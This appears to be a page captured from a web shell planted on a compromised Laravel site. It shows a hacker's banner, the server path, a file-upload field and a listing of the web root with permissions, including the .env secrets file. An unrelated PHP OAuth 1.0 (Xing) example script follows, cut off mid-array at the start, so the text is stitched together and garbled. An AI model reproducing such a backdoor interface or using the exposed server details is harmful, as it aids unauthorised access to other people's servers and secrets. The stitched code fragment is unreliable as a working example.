I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
'your-identifier',
'secret' => 'your-secret',
'callback_uri' => "http://your-callback-uri/",
));
// Start session
session_start();
// Step 4
if (isset($_GET['user'])) {
// Check somebody hasn't manually entered this URL in,
// by checking that we have the token credentials in
// the session.
if ( ! isset($_SESSION['token_credentials'])) {
echo 'No token credentials.';
exit(1);
}
// Retrieve our token credentials. From here, it's play time!
$tokenCredentials = unserialize($_SESSION['token_credentials']);
// // Below is an example of retrieving the identifier & secret
// // (formally known as access token key & secret in earlier
// // OAuth 1.0 specs).
// $identifier = $tokenCredentials->getIdentifier();
// $secret = $tokenCredentials->getSecret();
// Some OAuth clients try to act as an API wrapper for
// the server and it's API. We don't. This is what you
// get - the ability to access basic information. If
// you want to get fancy, you should be grabbing a
// package for interacting with the APIs, by using
// the identifier & secret that this package was
// designed to retrieve for you. But, for fun,
// here's basic user information.
$user = $server->getUserDetails($tokenCredentials);
var_dump($user);
// Step 3
} elseif (isset($_GET['oauth_token']) && isset($_GET['oauth_verifier'])) {
// Retrieve the temporary credentials from step 2
$temporaryCredentials = unserialize($_SESSION['temporary_credentials']);
// Third and final part to OAuth 1.0 authentication is to retrieve token
// credentials (formally known as access tokens in earlier OAuth 1.0
// specs).
$tokenCredentials = $server->getTokenCredentials($temporaryCredentials, $_GET['oauth_token'], $_GET['oauth_verifier']);
// Now, we'll store the token credentials and discard the temporary
// ones - they're irrelevant at this stage.
unset($_SESSION['temporary_credentials']);
$_SESSION['token_credentials'] = serialize($tokenCredentials);
session_write_close();
// Redirect to the user page
header("Location: http://{$_SERVER['HTTP_HOST']}/?user=user");
exit;
// Step 2.5 - denied request to authorize client
} elseif (isset($_GET['denied'])) {
echo 'Hey! You denied the client access to your Xing account! If you did this by mistake, you should try again.';
// Step 2
} elseif (isset($_GET['go'])) {
// First part of OAuth 1.0 authentication is retrieving temporary credentials.
// These identify you as a client to the server.
$temporaryCredentials = $server->getTemporaryCredentials();
// Store the credentials in the session.
$_SESSION['temporary_credentials'] = serialize($temporaryCredentials);
session_write_close();
// Second part of OAuth 1.0 authentication is to redirect the
// resource owner to the login screen on the server.
$server->authorize($temporaryCredentials);
// Step 1
} else {
// Display link to start process
echo 'Login';
}